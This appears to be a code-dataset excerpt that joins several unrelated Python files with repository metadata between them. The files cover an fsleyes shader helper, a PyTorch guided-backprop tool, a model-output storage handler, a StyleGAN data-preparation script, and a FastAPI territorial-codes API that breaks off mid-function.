These functions are used by the :mod:`.gl14.glrgbvector_funcs` and
:mod:`.gl14.gllinevector_funcs` modules.
"""
import numpy as np
import fsl.data.constants as constants
import fsl.transform.affine as affine
import fsleyes.gl.shaders as shaders
def destroy(self):
"""Destroys the vertex/fragment shader programs created in :func:`init`.
"""
self.shader.destroy()
self.shader = None
def compileShaders(self, vertShader):
"""Compiles the vertex/fragment shader programs (by creating a
:class:`.GLSLShader` instance).
If the :attr:`.VectorOpts.colourImage` property is set, the ``glvolume``
fragment shader is used. Otherwise, the ``glvector`` fragment shader
is used.
"""
if self.shader is not None:
self.shader.destroy()
opts = self.opts
useVolumeFragShader = opts.colourImage is not None
if useVolumeFragShader: fragShader = 'glvolume'
else: fragShader = 'glvector'
vertSrc = shaders.getVertexShader( vertShader)
fragSrc = shaders.getFragmentShader(fragShader)
if useVolumeFragShader:
textures = {
'clipTexture' : 1,
'imageTexture' : 2,
'colourTexture' : 3,
'negColourTexture' : 3,
# glvolume frag shader expects a modulate
# alpha texture, but it is not used
'modulateTexture' : 1,
}
else:
textures = {
'modulateTexture' : 0,
'clipTexture' : 1,
'vectorTexture' : 4,
}
self.shader = shaders.ARBPShader(vertSrc,
fragSrc,
shaders.getShaderDir(),
textures)
def updateShaderState(self):
"""Updates the state of the vector vertex and fragment shaders - the
fragment shader may may be either the ``glvolume`` or the ``glvector``
shader.
"""
opts = self.opts
useVolumeFragShader = opts.colourImage is not None
modLow, modHigh = self.getModulateRange()
clipLow, clipHigh = self.getClippingRange()
modMode = {'brightness' : -0.5,
'alpha' : 0.5}[opts.modulateMode]
clipping = [clipLow, clipHigh, -1, -1]
if np.isclose(modHigh, modLow):
mod = [0, 0, 0, 0]
else:
mod = [modLow, modHigh, 1.0 / (modHigh - modLow), modMode]
# Inputs which are required by both the
# glvolume and glvetor fragment shaders
self.shader.setFragParam('clipping', clipping)
clipCoordXform = self.getAuxTextureXform('clip')
colourCoordXform = self.getAuxTextureXform('colour')
modCoordXform = self.getAuxTextureXform('modulate')
self.shader.setVertParam('clipCoordXform', clipCoordXform)
self.shader.setVertParam('colourCoordXform', colourCoordXform)
self.shader.setVertParam('modCoordXform', modCoordXform)
if useVolumeFragShader:
voxValXform = self.colourTexture.voxValXform
cmapXform = self.cmapTexture.getCoordinateTransform()
voxValXform = affine.concat(cmapXform, voxValXform)
voxValXform = [voxValXform[0, 0], voxValXform[0, 3], 0, 0]
self.shader.setFragParam('voxValXform', voxValXform)
# settings expected by glvolume
# frag shader, but not used
self.shader.setFragParam('negCmap', [-1, 0, 0, 0])
self.shader.setFragParam('modulate', [0, 0, -1, 1])
else:
colours, colourXform = self.getVectorColours()
# See comments in gl21/glvector_funcs.py
if self.vectorImage.niftiDataType == constants.NIFTI_DT_RGB24:
voxValXform = affine.scaleOffsetXform(2, -1)
else:
voxValXform = self.imageTexture.voxValXform
voxValXform = [voxValXform[0, 0], voxValXform[0, 3], 0, 0]
self.shader.setFragParam('voxValXform', voxValXform)
self.shader.setFragParam('mod', mod)
self.shader.setFragParam('xColour', colours[0])
self.shader.setFragParam('yColour', colours[1])
self.shader.setFragParam('zColour', colours[2])
self.shader.setFragParam('colourXform', [colourXform[0, 0],
colourXform[0, 3], 0, 0])
return True
| 33.514286
| 78
| 0.618713
|
dd808f3d00340b79710009f9ac8c29c92e4b3c26
| 2,749
|
py
|
Python
|
activation_maps/guided_backprop.py
|
fhalamos/predicting-poverty-replication
|
55c94cf6bd31b4f99c059167c0c031126160d3bd
|
[
"MIT"
] | 59
|
2019-10-24T23:33:22.000Z
|
2022-03-23T06:04:50.000Z
|
activation_maps/guided_backprop.py
|
fhalamos/predicting-poverty-replication
|
55c94cf6bd31b4f99c059167c0c031126160d3bd
|
[
"MIT"
] | 8
|
2020-02-27T15:50:45.000Z
|
2022-03-12T00:03:04.000Z
|
activation_maps/guided_backprop.py
|
fhalamos/predicting-poverty-replication
|
55c94cf6bd31b4f99c059167c0c031126160d3bd
|
[
"MIT"
] | 36
|
2019-11-08T18:03:17.000Z
|
2022-02-16T00:28:59.000Z
|
"""
Taken directly from https://github.com/utkuozbulak/pytorch-cnn-visualizations
"""
import torch
from torch.nn import ReLU
class GuidedBackprop():
"""
Produces gradients generated with guided back propagation from the given image
"""
def __init__(self, model):
self.model = model
self.gradients = None
self.forward_relu_outputs = []
# Put model in evaluation mode
self.model.eval()
self.update_relus()
self.hook_layers()
def hook_layers(self):
def hook_function(module, grad_in, grad_out):
self.gradients = grad_in[0]
# Register hook to the first layer
first_layer = list(self.model.features._modules.items())[0][1]
first_layer.register_backward_hook(hook_function)
def update_relus(self):
"""
Updates relu activation functions so that
1- stores output in forward pass
2- imputes zero for gradient values that are less than zero
"""
def relu_backward_hook_function(module, grad_in, grad_out):
"""
If there is a negative gradient, change it to zero
"""
# Get last forward output
corresponding_forward_output = self.forward_relu_outputs[-1]
corresponding_forward_output[corresponding_forward_output > 0] = 1
modified_grad_out = corresponding_forward_output * torch.clamp(grad_in[0], min=0.0)
del self.forward_relu_outputs[-1] # Remove last forward output
return (modified_grad_out,)
def relu_forward_hook_function(module, ten_in, ten_out):
"""
Store results of forward pass
"""
self.forward_relu_outputs.append(ten_out)
# Loop through layers, hook up ReLUs
for pos, module in self.model.features._modules.items():
if isinstance(module, ReLU):
module.register_backward_hook(relu_backward_hook_function)
module.register_forward_hook(relu_forward_hook_function)
def generate_gradients(self, input_image, target_class):
self.model.zero_grad()
# Forward pass
model_output = self.model(input_image)
# Zero gradients
self.model.zero_grad()
# Target for backprop
one_hot_output = torch.FloatTensor(1, model_output.size()[-1]).zero_()
one_hot_output[0][target_class] = 1
# Backward pass
model_output.backward(gradient=one_hot_output)
# Convert Pytorch variable to numpy array
# [0] to get rid of the first channel (1,3,224,224)
gradients_as_arr = self.gradients.data.numpy()[0]
return gradients_as_arr
| 37.657534
| 95
| 0.636595
|
1a519329eb4ae5d7f7b589948e2782d816f96ba8
| 257
|
py
|
Python
|
backend/apps/cmdb/serializers/__init__.py
|
codelieche/erp
|
96861ff63a63a93918fbd5181ffb2646446d0eec
|
[
"MIT"
] | null | null | null |
backend/apps/cmdb/serializers/__init__.py
|
codelieche/erp
|
96861ff63a63a93918fbd5181ffb2646446d0eec
|
[
"MIT"
] | 29
|
2020-06-05T19:57:11.000Z
|
2022-02-26T13:42:36.000Z
|
backend/apps/cmdb/serializers/__init__.py
|
codelieche/erp
|
96861ff63a63a93918fbd5181ffb2646446d0eec
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
from .model import ModelSerializer, ModelInfoSerializer
from .field import FieldModelSerializer
from .instance import InstanceModelSerializer
from .value import ValueModelSerializer
from .permission import PermissionModelSerializer
| 28.555556
| 55
| 0.836576
|
6d7982488c483b16ccf1c5f948b286d9e61e878f
| 1,976
|
py
|
Python
|
_unittests/ut_onnxrt/test_rt_valid_model_normalizer.py
|
henrywu2019/mlprodict
|
4c09dc39d5ba7a7235fa321d80c81b5bf4f078ad
|
[
"MIT"
] | 1
|
2020-12-18T03:49:53.000Z
|
2020-12-18T03:49:53.000Z
|
_unittests/ut_onnxrt/test_rt_valid_model_normalizer.py
|
henrywu2019/mlprodict
|
4c09dc39d5ba7a7235fa321d80c81b5bf4f078ad
|
[
"MIT"
] | null | null | null |
_unittests/ut_onnxrt/test_rt_valid_model_normalizer.py
|
henrywu2019/mlprodict
|
4c09dc39d5ba7a7235fa321d80c81b5bf4f078ad
|
[
"MIT"
] | null | null | null |
"""
@brief test log(time=9s)
"""
import unittest
from logging import getLogger
from pyquickhelper.loghelper import fLOG
from pyquickhelper.pycode import ExtTestCase
from sklearn.exceptions import ConvergenceWarning
try:
from sklearn.utils._testing import ignore_warnings
except ImportError:
from sklearn.utils.testing import ignore_warnings
from skl2onnx import __version__ as skl2onnx_version
from mlprodict.onnxrt.validate import enumerate_validated_operator_opsets
class TestRtValidateNormalizer(ExtTestCase):
@ignore_warnings(category=(UserWarning, ConvergenceWarning, RuntimeWarning))
def test_rt_Normalizer_onnxruntime(self):
fLOG(__file__, self._testMethodName, OutputPrint=__name__ == "__main__")
logger = getLogger('skl2onnx')
logger.disabled = True
verbose = 1 if __name__ == "__main__" else 0
buffer = []
def myprint(*args, **kwargs):
buffer.append(" ".join(map(str, args)))
rows = list(enumerate_validated_operator_opsets(
verbose, models={"Normalizer"},
fLOG=myprint,
runtime='onnxruntime2', debug=True))
self.assertGreater(len(rows), 1)
self.assertGreater(len(buffer), 1)
@ignore_warnings(category=(UserWarning, ConvergenceWarning, RuntimeWarning))
def test_rt_Normalizer_python(self):
fLOG(__file__, self._testMethodName, OutputPrint=__name__ == "__main__")
logger = getLogger('skl2onnx')
logger.disabled = True
verbose = 1 if __name__ == "__main__" else 0
buffer = []
def myprint(*args, **kwargs):
buffer.append(" ".join(map(str, args)))
rows = list(enumerate_validated_operator_opsets(
verbose, models={"Normalizer"},
fLOG=myprint,
runtime='python', debug=True))
self.assertGreater(len(rows), 1)
self.assertGreater(len(buffer), 1)
if __name__ == "__main__":
unittest.main()
| 32.933333
| 80
| 0.681174
|
6fce29d6d02940925223992774320049add136f0
| 28,894
|
py
|
Python
|
dof/storage.py
|
hyperrixel/dof
|
4f1500fd7c78a438f0812e46a3938a8dbd2b0db7
|
[
"MIT"
] | null | null | null |
dof/storage.py
|
hyperrixel/dof
|
4f1500fd7c78a438f0812e46a3938a8dbd2b0db7
|
[
"MIT"
] | null | null | null |
dof/storage.py
|
hyperrixel/dof
|
4f1500fd7c78a438f0812e46a3938a8dbd2b0db7
|
[
"MIT"
] | null | null | null |
"""
DoF - Deep Model Core Output Framework
======================================
Submodule: storage
"""
from abc import ABC, abstractmethod
import json
from os import listdir
from os.path import isfile, join
import pickle
from .error import DofError
class DofObjectHandler(ABC):
"""
Abstract class (de facto interface) to provide storage management of data
=========================================================================
Attributes
----------
handler_type : str (read-only)
Get the type of the handler.
is_closed : bool (abstract) (read-only)
Get whether the handler is closed or not.
is_open : bool (abstract) (read-only)
Get whether the handler is open or not.
"""
# These variables should be static class level constants but this out of the
# capabilites of Python.
LOCAL = 'local'
ONLINE = 'online'
@abstractmethod
def __init__(self, handler_type : str, *args, **kwargs):
"""
Semi-abstract method to initialize an instance of the object
============================================================
Parameters
----------
handler_type : str
Type of the DofObjectHandler. Should be DofObjectHandler.LOCAL or
DofObjectHandler.ONLINE.
Raises
------
DofError
When the given handler type is not suppported.
"""
if handler_type in [DofObjectHandler.LOCAL, DofObjectHandler.ONLINE]:
self.__handler_type = handler_type
else:
raise DofError('DofObjectHandler.init(): unsupported handler type.')
@abstractmethod
def close(self):
"""
Abstract method to close the connection with the storage
========================================================
"""
@abstractmethod
def exist(self, location : str, is_relative : bool = True) -> bool:
"""
Abstract method to check the existence file
===========================================
Parameters
----------
location : str
Location to check.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
bool
True if file exists, False if not.
"""
@abstractmethod
def files(self, location : str, is_relative : bool = True) -> list:
"""
Abstract method to get list of files in a directory
===================================================
Parameters
----------
location : str
Location to check.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
list
List of files, empty list if no files.
"""
@property
def handler_type(self) -> bool:
"""
Get the type of the handler
===========================
Returns
-------
bool
Type of the handler.
See Also:
Handler types : DofObjectHandler.LOCAL, DofObjectHandler.ONLINE
"""
return self.__handler_type
@property
@abstractmethod
def is_closed(self) -> bool:
"""
Get whether the handler is closed or not
========================================
Returns
-------
bool
True if handler is closed, False if not.
"""
@property
@abstractmethod
def is_open(self) -> bool:
"""
Abstract method to get whether the handler is open or not
=========================================================
Returns
-------
bool
True if handler is open, False if not.
"""
@abstractmethod
def load_as_binary(self, location : str,
is_relative : bool = True) -> bytearray:
"""
Abstract method to load data as binary data
===========================================
Parameters
----------
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
bytearray
Load data as bytearray.
"""
@abstractmethod
def load_as_instance(self, location : str,
is_relative : bool = True) -> any:
"""
Abstract method to load data as instance
========================================
Parameters
----------
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
any
Load data as any instances.
"""
@abstractmethod
def load_as_json(self, location : str,
is_relative : bool = True) -> any:
"""
Abstract method to load data as JSON data
=========================================
Parameters
----------
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
any
Load data as JSON.
"""
@abstractmethod
def load_as_text(self, location : str, is_relative : bool = True) -> str:
"""
Abstract method to load data as text
====================================
Parameters
----------
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
str
Load data as a string.
"""
@abstractmethod
def open(self):
"""
Abstract method to open the connection with the storage
=======================================================
"""
@abstractmethod
def save_as_binary(self, data : any, location : str,
is_relative : bool = True):
"""
Abstract method to save data as binary
======================================
Parameters
----------
data : any
Data to save in the form true binary data.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Notes
-----
By implementing this function please keep in mind that data can be
anything. It depends on the use case what how data should be
processed to achieve a binary form to save. Saving data in pure
binary form (not pickle) can be a good source of building platform
(programming language) agnostic frameworks.
"""
@abstractmethod
def save_as_instance(self, data : any, location : str,
is_relative : bool = True):
"""
Abstract method to save data as instance
========================================
Parameters
----------
data : any
Data to save in the form a python instance.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Notes
-----
By implementing this function please keep in mind that data should
be saved as an instance (in most cases python instance).
"""
@abstractmethod
def save_as_json(self, data : any, location : str,
is_relative : bool = True):
"""
Abstract method to save data as JSON data
=========================================
Parameters
----------
data : any
Data to save in the form JSON.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Notes
-----
By implementing this function please keep in mind that data should
be saved as JSON and not everything is serializable on its own.
"""
@abstractmethod
def save_as_text(self, data : any, location : str,
is_relative : bool = True):
"""
Abstract method to save data as text
====================================
Parameters
----------
data : any
Data to save as text.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Notes
-----
By implementing this function please keep in mind that data can be
anything. It depends on the use case what how data should be
processed to achieve a text to save.
"""
class DofSerializable:
"""
Provide serializability functions
=================================
"""
@abstractmethod
def from_json(self, json_string : str, **kwargs) -> any:
"""
Abstract methot to build object from JSON string
================================================
Parameters
----------
json_string : str
The JSON formatted string that contains all the needed data.
keyword arguments
Arguments to forward to json.loads() funtion.
Returns
-------
any
The object that is created.
Notes
-----
This function requires a JSON string that is created with the
.to_json(describe_only=False) function.
"""
def to_json(self, describe_only : bool = True, **kwargs) -> str:
"""
Create JSON from an instance
============================
Parameters
----------
describe_only : bool, optional (True if omitted)
Whether the JSON output should be a whole instance or not. If the
value is False, the function returns all data of the instance that
is needed to restore exactly the same instance. If the value is
True, only those data should be included which are essential to
describe the data.
keyword arguments
Arguments to forward to json.dunps() funtion.
Returns
-------
str
JSON formatted string.
Notes
-----
If the value of describe_only parameter is True, only description
data returns. This means the dataset won't be included. It does not
matter that the dataelements are images or strings. The goal of
describe_only is not to store the data but to describe it.
"""
data = self.to_json_dict(describe_only=describe_only)
return json.dumps(data, **kwargs)
@abstractmethod
def to_json_dict(self, describe_only : bool = True) -> dict:
"""
Abstract method to create a dict that is compatible to JSON from
================================================================
Parameters
----------
describe_only : bool, optional (True if omitted)
Whether the JSON output should be a whole instance or not. If the
value is False, the function returns all data of the instance that
is needed to restore exactly the same instance. If the value is
True, only those data should be included which are essential to
describe the data.
Returns
-------
dict
Dict that is complatible to create a JSON formatted string.
Notes
-----
If the value of describe_only parameter is True, only description
data returns. This means the dataset won't be included. It does not
matter that the dataelements are images or strings. The goal of
describe_only is not to store the data but to describe it.
"""
class LocalHandler(DofObjectHandler):
"""
Local storage handler
=====================
Attributes
----------
encoding : str
Encoding type for files with textual content (text, JSON).
handler_type : str (inherited) (read-only)
Get the type of the handler.
is_closed : bool (read-only)
Get whether the handler is closed or not.
is_open : bool (read-only)
Get whether the handler is open or not.
"""
def __init__(self, base_path : str = './', encoding : str = 'uf8'):
"""
Initialize an instance of the object
====================================
Parameters
----------
base_path : str, optional (./ if ommited)
Base path to be used on loading or saving files.
encoding : str, optional (utf8 if omitted)
Encoding type of textual files like text and JSON files.
"""
super().__init__(DofObjectHandler.LOCAL)
self.__base_path = base_path
self.__is_open = False
self.__encoding = encoding
def close(self):
"""
Close the connection with the storage
=====================================
"""
self.__is_open = False
@property
def encoding(self) -> str:
"""
Get encoding for textual files
==============================
Returns
-------
str
The identifier of the actual encoding method.
"""
return self.__encoding
@encoding.setter
def encoding(self, newvalue : str):
"""
Set encoding for textual files
==============================
Parameters
----------
newvalue : str
The identifier of the new encoding method.
"""
self.__encoding = newvalue
@property
def is_closed(self) -> bool:
"""
Get whether the handler is closed or not
========================================
Returns
-------
bool
True if handler is closed, False if not.
"""
return not self.__is_open
@property
def is_open(self) -> bool:
"""
Get whether the handler is open or not
======================================
Returns
-------
bool
True if handler is open, False if not.
"""
return self.__is_open
def exist(self, location : str, is_relative : bool = True) -> bool:
"""
Abstract method to check the existence file
===========================================
Parameters
----------
location : str
Location to check.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
bool
True if file exists, False if not.
"""
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
return isfile(_location)
def files(self, location : str, is_relative : bool = True) -> list:
"""
Abstract method to get list of files in a directory
===================================================
Parameters
----------
location : str
Location to check.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
list
List of files, empty list if no files.
"""
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
return [f for f in listdir(_location) if isfile(f)]
def load_as_binary(self, location : str,
is_relative : bool = True) -> bytearray:
"""
Load data as binary data
========================
Parameters
----------
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
bytearray
Load data as bytearray.
Raises
------
DofError
If the hanlder is not yet or no mor open.
DofError
If the target file doesn't exist.
"""
if not self.__is_open:
raise DofError('LocalHandler.load_as_binary(): handler is not ' +
'open.')
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
if not isfile(_location):
raise DofError('LocalHandler.load_as_binary(): tried to ' +
'load binary from non-existing file "{}".'
.format(_location))
with open(_location, 'rb') as instream:
result = instream.read()
return result
def load_as_instance(self, location : str,
is_relative : bool = True) -> any:
"""
Load data as instance
=====================
Parameters
----------
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
any
Load data as any instances.
Raises
------
DofError
If the hanlder is not yet or no mor open.
DofError
If the target file doesn't exist.
"""
if not self.__is_open:
raise DofError('LocalHandler.load_as_instance(): handler is not ' +
'open.')
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
if not isfile(_location):
raise DofError('LocalHandler.load_as_instance(): tried to ' +
'load instance from non-existing file "{}".'
.format(_location))
with open(_location, 'rb') as instream:
result = pickle.load(instream)
return result
def load_as_json(self, location : str, is_relative : bool = True) -> any:
"""
Abstract method to load data as JSON data
=========================================
Parameters
----------
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
any
Load data as JSON.
Raises
------
DofError
If the hanlder is not yet or no mor open.
DofError
If the target file doesn't exist.
"""
if not self.__is_open:
raise DofError('LocalHandler.load_as_json(): handler is not open.')
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
if not isfile(_location):
raise DofError('LocalHandler.load_as_json(): tried to load JSON ' +
'from non-existing file "{}".'.format(_location))
with open(_location, 'r', encoding=self.__encoding) as instream:
result = json.load(instream)
return result
def load_as_text(self, location : str, is_relative : bool = True) -> list:
"""
Load data as text
=================
Parameters
----------
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
list[str]
Load data as a list of lines.
Raises
------
DofError
If the hanlder is not yet or no mor open.
DofError
If the target file doesn't exist.
"""
if not self.__is_open:
raise DofError('LocalHandler.load_as_text(): handler is not open.')
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
if not isfile(_location):
raise DofError('LocalHandler.load_as_text(): tried to load text ' +
'from non-existing file "{}".'.format(_location))
with open(_location, 'r', encoding=self.__encoding) as instream:
result = instream.readlines()
return result
def open(self):
"""
Abstract method to open the connection with the storage
=======================================================
"""
self.__is_open = True
def save_as_binary(self, data : any, location : str,
is_relative : bool = True):
"""
Save data as binary
===================
Parameters
----------
data : any
Data to save in the form true binary data.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Raises
------
DofError
When the handler is not open.
"""
if self.__is_open:
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
if hasattr(data, 'to_binary') or isinstance(data, bytearray):
if hasattr(data, 'to_binary'):
to_write = data.to_binary()
else:
to_write = data
with open(_location, 'wb') as outstream:
outstream.write(to_write)
else:
with open(_location, 'wb') as outstream:
pickle.dump(data, outstream)
else:
raise DofError('LocalHandler.save_as_binary(): handler is not ' +
'open.')
def save_as_instance(self, data : any, location : str,
is_relative : bool = True):
"""
Save data as instance
=====================
Parameters
----------
data : any
Data to save in the form a python instance.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Raises
------
DofError
When the handler is not open.
"""
if self.__is_open:
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
with open(_location, 'wb') as outstream:
pickle.dump(data, outstream)
else:
raise DofError('LocalHandler.save_as_instance(): handler is not ' +
'open.')
def save_as_json(self, data : any, location : str,
is_relative : bool = True):
"""
Abstract method to save data as JSON data
=========================================
Parameters
----------
data : any
Data to save in the form JSON.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Raises
------
DofError
When the handler is not open.
"""
if self.__is_open:
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
with open(_location, 'w', encoding=self.__encoding) as outstream:
json.dump(data, outstream)
else:
raise DofError('LocalHandler.save_as_instance(): handler is not ' +
'open.')
def save_as_text(self, data : any, location : str,
is_relative : bool = True):
"""
Save data as text
=================
Parameters
----------
data : str | list
Data to save as text. If list is given, elements of list is
considered is lines of text.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Raises
------
DofError
When the handler is not open.
"""
if self.__is_open:
if isinstance(data, list):
_output = '\n'.join([str(row) for row in list])
else:
_output = data
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
with open(_location, 'w', encoding=self.__encoding) as outstream:
outstream.write(_output)
else:
raise DofError('LocalHandler.save_as_text(): handler is not open.')
if __name__ == '__main__':
pass
| 30.446786
| 80
| 0.516543
|
da16d21fe4c494063f096fb8f1bcada9ba7b8285
| 1,972
|
py
|
Python
|
scripts/gan/stylegan/prepare_data.py
|
xdeng7/gluon-cv
|
4ae90c0157d3b29caee68371afe73c06b132fc7c
|
[
"Apache-2.0"
] | 1
|
2020-04-30T03:37:13.000Z
|
2020-04-30T03:37:13.000Z
|
scripts/gan/stylegan/prepare_data.py
|
xdeng7/gluon-cv
|
4ae90c0157d3b29caee68371afe73c06b132fc7c
|
[
"Apache-2.0"
] | null | null | null |
scripts/gan/stylegan/prepare_data.py
|
xdeng7/gluon-cv
|
4ae90c0157d3b29caee68371afe73c06b132fc7c
|
[
"Apache-2.0"
] | null | null | null |
import argparse
from io import BytesIO
import multiprocessing
from functools import partial
from PIL import Image
import lmdb
from tqdm import tqdm
import mxnet.ndarray as nd
from mxnet.gluon.data.vision.datasets import ImageFolderDataset
def resize_and_convert(img, size, quality=100):
img = img.resize(size)
# img = trans_fn.center_crop(img, size)
buffer = BytesIO()
img.save(buffer, format='jpeg', quality=quality)
val = buffer.getvalue()
return val
def resize_multiple(img, sizes=(8, 16, 32, 64, 128, 256, 512, 1024), quality=100):
imgs = []
for size in sizes:
imgs.append(resize_and_convert(img, size, quality))
return imgs
def resize_worker(img_file, sizes):
i, file = img_file
img = Image.open(file)
img = img.convert('RGB')
out = resize_multiple(img, sizes=sizes)
return i, out
def prepare(transaction, dataset, n_worker, sizes=(8, 16, 32, 64, 128, 256, 512, 1024)):
resize_fn = partial(resize_worker, sizes=sizes)
files = sorted(dataset.items, key=lambda x: x[0])
files = [(i, file) for i, (file, label) in enumerate(files)]
total = 0
with multiprocessing.Pool(n_worker) as pool:
for i, imgs in tqdm(pool.imap_unordered(resize_fn, files)):
for size, img in zip(sizes, imgs):
key = f'{size}-{str(i).zfill(5)}'.encode('utf-8')
transaction.put(key, img)
total += 1
transaction.put('length'.encode('utf-8'), str(total).encode('utf-8'))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--out', type=str)
parser.add_argument('--n_worker', type=int, default=8)
parser.add_argument('--path', type=str)
args = parser.parse_args()
imgset = ImageFolderDataset(args.path)
with lmdb.open(args.out, map_size=1024 ** 4, readahead=False) as env:
with env.begin(write=True) as txn:
prepare(txn, imgset, args.n_worker)
| 26.648649
| 88
| 0.656187
|
e42e8675b1f2ac3c4052bd21bf7356c67741e6ec
| 4,863
|
py
|
Python
|
directory/territories/api.py
|
hyzyla/directory.org.ua
|
f47ccc42b566cbdd30d735da8b47e5e7426ccf7b
|
[
"MIT"
] | null | null | null |
directory/territories/api.py
|
hyzyla/directory.org.ua
|
f47ccc42b566cbdd30d735da8b47e5e7426ccf7b
|
[
"MIT"
] | null | null | null |
directory/territories/api.py
|
hyzyla/directory.org.ua
|
f47ccc42b566cbdd30d735da8b47e5e7426ccf7b
|
[
"MIT"
] | null | null | null |
from http import HTTPStatus
from fastapi import Depends, HTTPException, Request
from sqlalchemy.orm import Session
from directory.lib.db import db_dependency
from directory.lib.router import APIRouter
from directory.lib.settings import settings
from directory.territories import db
from directory.territories.schemas import (
GetKATOTTGListResponse,
KATOTTG,
GetKATOTTGListParams,
GetKOATUUListResponse,
GetKOATUUGListParams,
GetKATOTTGListLegacyResponse,
)
from directory.tokens import utils as tokens
router = APIRouter(
prefix="/api",
responses={
200: {"description": "Успішна відповідь"},
422: {"description": "Декілька або один параметр запиту містить помилку"},
500: {"description": "Невідома помилка серверу"},
},
)
_KATOTTG_TAG = "КАТОТТГ"
_KOATUU_TAG = "КОАТУУ"
@router.get(
"/katottg",
summary="Список КАТОТТГ",
tags=[_KATOTTG_TAG],
response_model=GetKATOTTGListResponse,
)
def get_katottg_list(
# input parameters
params: GetKATOTTGListParams = Depends(),
# dependencies
session: Session = Depends(db_dependency),
) -> GetKATOTTGListResponse:
katottg = db.get_katottg_list(
session=session,
code=params.code,
name=params.name,
level=params.level,
parent_id=params.parent,
category=params.category,
limit=params.limit,
offset=params.offset,
)
has_previous = params.page != 1
has_next = len(katottg) == params.page_size + 1
return GetKATOTTGListResponse(
has_next=has_next,
has_previous=has_previous,
page=params.page,
results=katottg,
)
@router.get(
"/katottg/{code}",
summary="Отримати дані по КАТОТТГ",
tags=[_KATOTTG_TAG],
response_model=KATOTTG,
responses={404: {"description": "Територіальну одиницю не знайдено"}},
)
def get_katottg_detail(code: str, session: Session = Depends(db_dependency)):
code = code.upper()
katottg = db.get_katottg(session=session, code=code)
if not katottg:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND,
detail=f"Територіальну одиницю не знайдено: {code}",
)
return katottg
@router.get(
"/koatuu",
summary="Список КОАТУУ",
tags=[_KOATUU_TAG],
response_model=GetKOATUUListResponse,
)
def get_koatuu_list( # input parameters
params: GetKOATUUGListParams = Depends(GetKOATUUGListParams),
# dependencies
session: Session = Depends(db_dependency),
) -> GetKOATUUListResponse:
koatuu = db.get_koatuu_list(
session=session,
code=params.code,
name=params.name,
category=params.category,
katottg_code=params.code,
katottg_name=params.name,
katottg_category=params.katottg_category,
limit=params.limit,
offset=params.offset,
)
has_previous = params.page != 1
has_next = len(koatuu) == params.page_size + 1
return GetKOATUUListResponse(
has_next=has_next,
has_previous=has_previous,
page=params.page,
results=koatuu,
)
@router.get(
"/koatuu/{code}",
summary="Отримати дані по КОАТУУ",
tags=[_KOATUU_TAG],
responses={404: {"description": "Територіальну одиницю не знайдено"}},
)
def get_koatuu_detail(code: str, session: Session = Depends(db_dependency)):
code = code.upper()
koatuu = db.get_koatuu(session=session, code=code)
if not koatuu:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND,
detail=f"Територіальну одиницю не знайдено: {code}",
)
return koatuu
@router.get(
"/territories",
summary="Список КАТОТТГ",
deprecated=True,
tags=[_KATOTTG_TAG],
response_model=GetKATOTTGListLegacyResponse,
)
def get_territory_list(
request: Request,
